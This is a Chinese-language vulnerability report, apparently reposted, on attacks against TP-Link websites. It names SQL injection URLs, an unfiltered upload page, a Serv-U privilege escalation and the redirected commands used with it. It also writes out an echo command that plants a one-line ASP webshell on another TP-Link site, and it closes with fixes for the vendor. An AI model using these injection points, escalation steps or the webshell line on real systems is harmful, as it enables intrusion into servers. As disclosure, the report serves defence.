注入点几枚
 
http://www.tp-link.cn/pages/smb/products.asp?c=3
 
http://www.tp-link.cn/pages/article-detail.asp?result=school&d=157
厂商还是全部代码都查查吧，全局过滤一下。
sqlmap跑出了密码:
 
 
 
后台的安全是在是不可以恭维啊。
 
http://www.tp-link.cn/pages/cms/upload.asp
什么都不过滤。。。
shell的权限挺小的，这个目录不支持aspx，本盘不能跨目录。
 www.2cto.com
C:\WINDOWS\Microsoft.NET\Framework\v2.0.50727\Temporary ASP.NET Files\root\目录下读取到了支持aspx的目录
读取C:\WINDOWS\Microsoft.NET\Framework\v2.0.50727\Temporary ASP.NET Files\root\f6ef54bd\de1a25fb\App_Web_8tlihkqz.0.cs文件发现还有aspx的站在服务器上。
跨不过去，翻了下43598端口开了，用servu的提权脚本执行：
whoami >I:\tpwebroot\download\2.txt发现servu被降权了，是user权限，不过权限也很高了，试着一下dir I:\ >I:\tpwebroot\download\3.txt,列出目录了，有读取权限，一层一层读下去，找到了其他网站的路径，直接
echo ^<%execute^(request^("#"^)^)%^> >I:\mobileMVC\test.asp搞到了http://www.tp-linkmobile.com.cn/，同理还有http://bbs.tp-linkmobile.com.cn。。。后面就不继续了，希望厂商还是控制下目录权限吧，好多个应用放到一个站。



 
 
修复方案：

主站的注入彻底修复下吧，servu的那个权限修改下，目录的权限也修改下吧。